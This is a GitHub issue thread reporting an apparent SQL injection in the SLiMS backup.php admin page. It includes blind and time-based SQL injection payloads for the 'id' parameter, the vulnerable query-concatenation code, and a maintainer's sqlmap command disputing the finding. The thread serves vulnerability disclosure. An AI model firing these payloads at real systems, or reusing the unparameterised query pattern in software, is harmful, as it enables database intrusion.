### ISSUE TITLE
[Security Bugs] SQL Injection

### ISSUE THREAD

**Issue by qmss** [slims/slims9_bulian#124]
SQL injection exists in the /admin/modules/system/backup.php file. There is no effective defense against the comment field, leading to SQL injection attacks.
The link is: `http://192.168.31.63/admin/modules/system/backup.php?action=download&id=1`
Vulnerable parameter `id`
SQL injection payload
`Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: action=download&id=2 OR NOT 8551=8551
`
`Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=download&id=2 AND (SELECT 7623 FROM (SELECT(SLEEP(5)))zpJu)`
<img width="558" alt="7" src="https://user-images.githubusercontent.com/18564938/147107829-026df7bf-f459-43e8-8388-4508075483bc.png">
The problematic code
`if(isset($_GET['action']) && isset($_GET['id']) && $_GET['action'] == 'download'){
  $id = utility::filterData('id', 'get', true, true, true);
  $_q = $dbs->query("SELECT backup_file FROM backup_log WHERE backup_log_id=".$id);
  $path = $_q->fetch_row()[0];`

**Comment by drajathasan** [comment]
Not affected with level 5.

`sqlmap -u "http://localhost:6001/admin/modules/system/backup.php?action=download&id=1" --level=5 --cookie=<cookie> --batch`

Defailt
SQLMap : 1.6.12#stable

![gambar](https://user-images.githubusercontent.com/38057222/209266186-45668615-75ba-4761-b1e1-172f1df4209a.png)
